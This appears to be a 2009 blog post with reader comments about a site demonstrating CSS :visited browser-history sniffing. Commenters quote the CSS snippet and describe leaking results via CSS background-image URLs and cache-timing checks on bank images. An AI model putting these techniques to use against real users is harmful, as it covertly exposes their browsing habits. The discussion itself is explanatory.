Start Panic
Apr 24

Start Panic

Start Panicking!: Think your browsing history is secure? It’s not.

Go here, and press the button.

If someone knows how they’re doing this, do tell.

by Deane   April 24, 2009 9:53 AM    |   Follow Gadgetopia on Twitter

Comments

by Lewis,   April 24, 2009 11:15 AM  

I've not looked at the code (yet) but I suspect they're putting links in the DOM and then checking their colour via CSS. It works because browsers change the link colours for websites that you've previously visited.

by Lewis,   April 24, 2009 11:19 AM  

Yep, a quick look at the code shows:

p.doc.write("a{color: #000000; display:none;}"); p.doc.write("a:visited {color: #FF0000; display:inline;}");

So it's only showing websites that have been visited. It also explains why they only seem to be top level domains it finds, and all reasonably popular. Still it's quite impressive how many it can find (it must have a huge database of domains).

by Mike Flynn,   April 24, 2009 3:33 PM  

That is damn clever!

by Josh,   April 25, 2009 1:27 AM  

Their db contains 100,000 entries: http://startpanic.com/db/db_en.txt (1.4M)

Neat trick!

by jonathan peterson,   April 29, 2009 8:50 PM  

javascript running on MY machine can find my visited history.

it's not like this is serverside technology.

clever, but not a security issue.

by Slobodan Kovacevic,   April 30, 2009 12:39 AM  

@jonathan It isn't a server side script, but it doesn't mean it's not a security issue. Script posts its results to server, effectively notifying server about sites you've visited.

by jcg,   May 6, 2009 9:59 AM  

not too worried about it. using NoScript, so nothing happened until i let it run.

by Joseph Marlin,   May 6, 2009 10:14 AM  

I wouldn't be too fast to dismiss this as minor.

@jcg: That's good, and I use NoScript too, but what about all the people who don't? @jonathan: Imagine a less-than-ethical business which would utilize this idea, coupled with a targeted database to determine browsing habits of their customers. Imagine advertisers using this as spyware. Yes it is client-side, but it doesn't require any user input to run, and the results could easily be sent back to a database, as Slobodan pointed out.

There are many nasty uses for this, if you put your mind to it.

by brandon c,   May 6, 2009 1:41 PM  

noscript alone won't protect you; you can load remote images in css without the help of javascript ("background: url('http://www.example.com/www.yahoo.com');")

by brandon c,   May 6, 2009 1:43 PM  

also see: http://ha.ckers.org/weird/CSS-history.cgi for some people who were doing this 2.5 years ago

by willis,   May 7, 2009 11:35 AM  

As some security experts have pointed out, this is good for determining if a particular CSRF may be appropriate for the visitor.

I'm thinking it wouldn't be difficult to load some hidden images from other sites (bankofamerica.com/global/images/new_Banklogo.gif) and find the load time to determine if it was cached and displayed versus downloaded and displayed.

by Pete,   May 18, 2009 6:35 PM  

There's a better version at http://linuxbox.co.uk/stealing-browser-history-with-javascipt-and-css.php - a lot faster and doesn't make my browser hang like SP does

by Jos,   November 10, 2010 11:03 AM  

So, does the above link that Pete so kindly posted find the history of the browser? My Chrome history page does that.

Add Comment